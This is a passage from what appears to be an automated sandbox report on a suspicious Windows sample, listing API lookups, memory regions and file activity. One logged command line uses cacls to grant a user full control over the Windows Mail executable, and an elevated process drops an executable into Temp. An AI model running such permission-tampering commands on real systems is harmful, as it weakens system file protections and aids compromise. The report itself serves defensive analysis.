| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:47 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #187: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #187 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xae0 |
| Parent PID | 0x770 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F08
0x
8EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000003b0000 | 0x003b0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00483fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00490fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x004b0000 | 0x0056dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x005f0000 | 0x005f1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00a70000 | 0x00da6fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec40000 | 0x7ec40000 | 0x7ed3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed40000 | 0x7ed40000 | 0x7ed62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ed67000 | 0x7ed67000 | 0x7ed69fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed6a000 | 0x7ed6a000 | 0x7ed6afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed6c000 | 0x7ed6c000 | 0x7ed6efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed6f000 | 0x7ed6f000 | 0x7ed6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #188: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #188 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xda0 |
| Parent PID | 0x85c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F6C
0x
FF8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00340000 | 0x003fdfff | Memory Mapped File | r |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00580000 | 0x005a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00887fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x01e1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e20000 | 0x01e20000 | 0x01fdffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
